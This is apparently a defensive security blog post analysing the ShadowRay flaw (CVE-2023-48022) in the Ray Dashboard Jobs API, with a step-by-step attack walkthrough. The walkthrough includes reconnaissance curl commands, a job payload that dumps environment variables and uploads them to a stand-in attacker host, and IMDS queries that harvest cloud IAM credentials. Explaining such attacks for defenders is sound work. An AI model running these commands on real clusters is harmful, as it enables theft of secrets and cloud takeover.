Ray AI Framework: Deconstructing ShadowRay Cluster RCE
Overview & Threat Landscape#
In the rapid enterprise transition toward generative artificial intelligence and large language models (LLMs), distributed compute engines have become the core operational backbone of modern AI infrastructure. Among these, Ray—an open-source framework developed by Anyscale and UC Berkeley—serves as the de facto computing substrate for training, fine-tuning, and serving frontier AI models at scale across multi-node GPU clusters.
However, the architecture of early AI frameworks prioritized distributed developer convenience over enterprise zero-trust security controls. This architectural trade-off culminated in CVE-2023-48022 (widely designated by researchers as ShadowRay), a pre-authentication remote code execution vulnerability residing in the Ray Dashboard and Jobs REST API. ShadowRay fundamentally changed the enterprise attack calculus:
- The Fallacy of "Trusted Internal AI Networks": Ray's core services were intentionally designed without native authentication or authorization mechanisms. The framework authors assumed that Ray clusters would operate exclusively inside completely trusted, air-gapped perimeters. When containerized deployments, Kubernetes Helm charts, or automated cloud provisioning scripts exposed the Ray Dashboard (default TCP port
8265) to external networks or unsegmented virtual private clouds (VPCs), the cluster became instantly exploitable by any unauthenticated entity. - Massive Blast Radius in AI Environments: Unlike traditional web application RCEs that compromise an isolated web server, compromising an AI compute cluster provides adversaries with direct access to hyper-privileged assets:
- Model Weights & Intellectual Property: Proprietary fine-tuned foundation models and training datasets stored in memory or local caching directories (
/root/.cache/huggingface/). - Critical Secrets in Environment Variables: Stored API keys (
OPENAI_API_KEY,HUGGINGFACE_CO_TOKEN, Weights & Biases credentials, and enterprise database connection strings). - Cloud Infrastructure Escalation via IMDS: Ray worker nodes typically run on powerful cloud compute instances (e.g., AWS EC2 GPU instances or GCP GKE nodes) equipped with high-privilege IAM roles. Attackers leverage cluster execution to query the Instance Metadata Service (IMDS), obtaining temporary cloud administrator credentials.
- Model Weights & Intellectual Property: Proprietary fine-tuned foundation models and training datasets stored in memory or local caching directories (
- Active Exploitation in the Wild: Identified by security researchers and subsequently cataloged in CISA's Known Exploited Vulnerabilities (KEV) catalog, threat actors actively weaponized ShadowRay to hijack thousands of enterprise GPU clusters for cryptocurrency mining, sensitive model theft, and AI training dataset poisoning.
[!WARNING] ShadowRay is not a conventional buffer overflow or syntax parsing bug. It is a fundamental architecture failure where unauthenticated administrative APIs execute arbitrary shell commands by design. Any accessible Ray Dashboard port must be treated as an open root terminal to your AI cluster.
Vulnerability & Attack Root-Cause Analysis#
To understand why ShadowRay enables trivial cluster takeover, we must examine the internal architecture of Ray, the distribution of responsibilities between head and worker nodes, and the code path within the Ray Dashboard Jobs API.
Ray Cluster Architecture: Head Nodes vs. Worker Nodes#
A Ray cluster consists of two distinct node tiers communicating over remote procedure calls (gRPC/DCE):
- Head Node:
- Runs the Global Control Store (GCS), which manages cluster metadata, actor registration, and task scheduling.
- Runs the Ray Dashboard and Jobs REST API server (default TCP port
8265). - Hosts internal services including the API server, Raylet master daemon, and autoscaler.
- Worker Nodes:
- Run the local
rayletdaemon and Plasma Object Store for distributed shared-memory management. - Spawn worker processes (actors and tasks) dynamically to execute computation pipelines across available CPUs and GPUs.
- Run the local
The Missing Authentication Boundary: CVE-2023-48022#
The root cause of CVE-2023-48022 resides in the design of the Ray Dashboard's HTTP server (dashboard/modules/job/job_head.py). The endpoint responsible for handling programmatic job submissions (POST /api/jobs/) lacked any token verification, mTLS enforcement, or API key validation.
When an HTTP client transmits a POST request to /api/jobs/, the Ray Dashboard deserializes the JSON payload and invokes the internal JobSubmitRequest handler:
# Conceptual representation of vulnerable Job submission handling in job_head.py
class JobHead(dashboard_utils.DashboardHeadModule):
def __init__(self, dashboard_head):
super().__init__(dashboard_head)
self._job_manager = JobManager(dashboard_head.gcs_client)
@routes.post("/api/jobs/")
async def submit_job(self, req: Request) -> Response:
# 1. No authentication or authorization check is performed
data = await req.json()
# 2. Extract user-supplied entrypoint command and runtime environment
entrypoint = data.get("entrypoint")
runtime_env = data.get("runtime_env", {})
metadata = data.get("metadata", {})
# 3. Submit directly to internal JobManager for distributed scheduling
job_id = await self._job_manager.submit_job(
entrypoint=entrypoint,
runtime_env=runtime_env,
metadata=metadata
)
return Response(
text=json.dumps({"job_id": job_id, "status": "PENDING"}),
content_type="application/json"
)
The Execution Pipeline: From HTTP Request to Shell Execution#
Once the JobManager accepts the submission, the execution flow proceeds automatically through the cluster architecture:
- Supervisor Actor Creation: The
JobManagergenerates a unique job identifier (e.g.,raysubmit_abcdef123456) and instructs the GCS to spawn a dedicated Job Supervisor Actor. - Process Spawn via Subprocess: The supervisor actor executes on an available node in the cluster. It prepares the execution context (working directory and environment variables) and executes the string passed in the
entrypointfield directly using Python'ssubprocess.Popen(entrypoint, shell=True):
# Execution within the Job Supervisor process
def run_job_supervisor(entrypoint: str, runtime_env: dict):
# Setup working directory and environment variables
setup_runtime_env(runtime_env)
# Executes arbitrary shell commands under the Ray process context
process = subprocess.Popen(
entrypoint,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
process.wait()
Because the Ray process typically runs under the container's default user context (which is root in many official and standard AI Docker images), the command executes with full administrative privileges over the underlying container or virtual machine.
Exploit Architecture#
The sequence diagram below illustrates the end-to-end attack progression from initial cluster reconnaissance through remote job dispatch, distributed worker scheduling, and cloud credential harvesting:
sequenceDiagram
autonumber
actor Attacker as Unauthenticated Adversary
participant Dashboard as Ray Dashboard (TCP 8265)
participant GCS as Global Control Store (Head Node)
participant Worker as Raylet Worker Node (GPU Node)
participant IMDS as Cloud Instance Metadata (169.254.169.254)
Note over Attacker,Dashboard: Phase 1: Cluster Discovery & Reconnaissance
Attacker->>Dashboard: GET /api/version
Dashboard-->>Attacker: HTTP 200 (Ray Version and Cluster State)
Attacker->>Dashboard: GET /nodes?view=summary
Dashboard-->>Attacker: HTTP 200 (Node IPs, GPU Resource Allocations)
Note over Attacker,Dashboard: Phase 2: Remote Job Dispatch (CVE-2023-48022)
Attacker->>Dashboard: POST /api/jobs/ (Payload: entrypoint shell command)
critical Missing Authentication Check
Dashboard->>Dashboard: Validate JSON Schema Only (No Auth Verification)
end
Dashboard->>GCS: Register New Job (ID: raysubmit_x7k9)
Dashboard-->>Attacker: HTTP 200 {"job_id": "raysubmit_x7k9", "status": "PENDING"}
Note over GCS,Worker: Phase 3: Distributed Execution Pipeline
GCS->>Worker: Schedule Job Supervisor Actor on Target GPU Worker
Worker->>Worker: subprocess.Popen(entrypoint, shell=True) as root
Note over Worker,IMDS: Phase 4: Credential Theft & Persistence
Worker->>IMDS: GET /latest/meta-data/iam/security-credentials/RoleName
IMDS-->>Worker: HTTP 200 (Temporary AccessKey, SecretKey, SessionToken)
Worker->>Attacker: Exfiltrate Cloud IAM Keys & HuggingFace Secrets
Worker->>Worker: Deploy Background Crypto Miner / Poison Model CheckpointAttack Path Step-by-Step#
Analyzing each discrete stage of a ShadowRay compromise reveals how external adversaries navigate Ray's management interfaces to compromise entire cloud environments.
Step 1: Reconnaissance via Unauthenticated Information Disclosure#
Adversaries scan public IP ranges or leverage internal network pivots (e.g., via Server-Side Request Forgery) to identify instances running the Ray Dashboard on TCP port 8265.
The attacker begins by verifying the software version and cluster availability:
# Querying Ray cluster version and health status
curl -s http://10.100.20.15:8265/api/version | jq .
The server responds with detailed version telemetry:
{
"ray_version": "2.8.0",
"ray_commit": "abcdef1234567890",
"dashboard_version": "2.8.0"
}
Next, the adversary enumerates the hardware inventory, active worker nodes, and attached accelerator hardware:
# Enumerating connected GPU nodes, hostnames, and IP addresses
curl -s http://10.100.20.15:8265/nodes?view=summary | jq '.data.summary[] | {node_ip: .ip, hostname: .hostname, gpus: .resources_total.GPU}'
This query returns exact network coordinates and hardware specifications for every worker node in the cluster, allowing the adversary to pinpoint high-value targets hosting NVIDIA A100 or H100 GPUs.
Step 2: Unauthenticated Job Submission via the REST API#
With cluster topology established, the adversary prepares a job submission payload. The /api/jobs/ endpoint accepts a JSON object specifying the shell command to execute in the entrypoint parameter:
# Submitting a remote job to execute an arbitrary shell payload
curl -X POST http://10.100.20.15:8265/api/jobs/ -H "Content-Type: application/json" -d '{
"entrypoint": "env > /tmp/env_dump.txt && curl -F "data=@/tmp/env_dump.txt" https://adversary-c2.net/collect",
"runtime_env": {},
"metadata": {
"job_submission_id": "research_eval_task_01"
}
}'
The Ray Dashboard immediately accepts the job and responds with an acknowledgment:
{
"job_id": "raysubmit_4f9a12bc89de",
"submission_id": "research_eval_task_01",
"status": "PENDING"
}
Step 3: Monitoring Job Execution and Standard Output#
The adversary tracks the execution state of the submitted job using the job query API:
# Querying the execution status and output of the submitted job
curl -s http://10.100.20.15:8265/api/jobs/raysubmit_4f9a12bc89de | jq '{status: .status, message: .message, start_time: .start_time}'
The attacker can also retrieve the live execution logs directly from the dashboard:
# Fetching execution logs generated by the job
curl -s http://10.100.20.15:8265/api/jobs/raysubmit_4f9a12bc89de/logs
Step 4: Post-Exploitation & Cloud Lateral Movement#
Once arbitrary command execution is achieved on a worker node, adversaries systematically harvest sensitive credentials:
- Environment Variable Extraction: AI pipelines heavily utilize environment variables to pass secrets to training scripts. Threat actors dump the environment to harvest tokens:
# Sensitive variables routinely recovered from compromised Ray worker nodes
OPENAI_API_KEY=sk-proj-xxxxxxxxxxxxxxxxxxxxxxxx
HUGGING_FACE_HUB_TOKEN=hf_xxxxxxxxxxxxxxxxxxxx
WANDB_API_KEY=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
AWS_SECRET_ACCESS_KEY=xxxxxxxxxxxxxxxxxxxxxxxx
DATABASE_URL=postgresql://postgres:secret@db.internal:5432/ai_prod
- Cloud Instance Metadata Service (IMDS) Abuse:
Ray nodes hosted in AWS, GCP, or Azure frequently communicate with object stores (such as S3 or GCS) to fetch training datasets. The adversary queries the link-local metadata address (
169.254.169.254) to extract instance profile tokens:
# Querying AWS IMDSv2 to extract attached IAM role credentials
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
ROLE_NAME=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE_NAME
If the attached IAM role possesses write permissions over cloud buckets or virtualization infrastructure, the attacker escalates privileges from the AI cluster to the entire cloud tenant.
- Model Weights & Training Dataset Exfiltration:
Adversaries locate cached models in standard directories (e.g.,
/root/.cache/huggingface/hub/or mounted NFS shares) and exfiltrate proprietary model architectures and weights.
Fast Cyber Defense Morning Takeaways#
- AI Frameworks Lack Native Zero-Trust Controls: Distributed compute frameworks like Ray were constructed for high-performance computing in isolated research labs. They do not implement enterprise identity primitives, authentication tokens, or role-based access control (RBAC) out of the box.
- Perimeter Exposure Is Catastrophic: Exposing TCP port
8265to untrusted networks grants unauthenticated, root-level remote code execution across the entire computing fleet. Network isolation is not optional—it is the primary security boundary. - The Cluster Is an Escalation Bridge: Compromising a single Ray worker provides a direct bridge to cloud IAM credentials, model storage, and downstream enterprise data lakes.
In tonight's Evening Defense Guide (EDITION 2), we will engineer production blue team defenses for Ray AI clusters:
- Deploying reverse proxy authentication gates (NGINX/OAuth2-Proxy with mTLS) in front of the Ray Dashboard.
- Network security policies and Kubernetes network policies isolating TCP port
8265strictly to administrative bastion hosts. - Production Sigma rules and Zeek/Suricata signatures detecting unauthenticated
/api/jobs/requests and anomalous IMDS access. - Hardening instance metadata access (enforcing IMDSv2 with hop limits) to prevent credential exfiltration from containerized worker nodes.
Authoritative References#
- Oligo Security Threat Research: ShadowRay: First Known Active Exploitation of AI Workloads in the Wild — Oligo Blog
- Cybersecurity and Infrastructure Security Agency (CISA): Known Exploited Vulnerabilities (KEV) Catalog - CVE-2023-48022 — CISA KEV
- National Vulnerability Database (NVD): CVE-2023-48022 Detail: Missing Authentication in Ray Dashboard — NIST NVD
- Anyscale Security Advisory: Ray Security Architecture & Hardening Best Practices — Ray Documentation
Comments
Post a Comment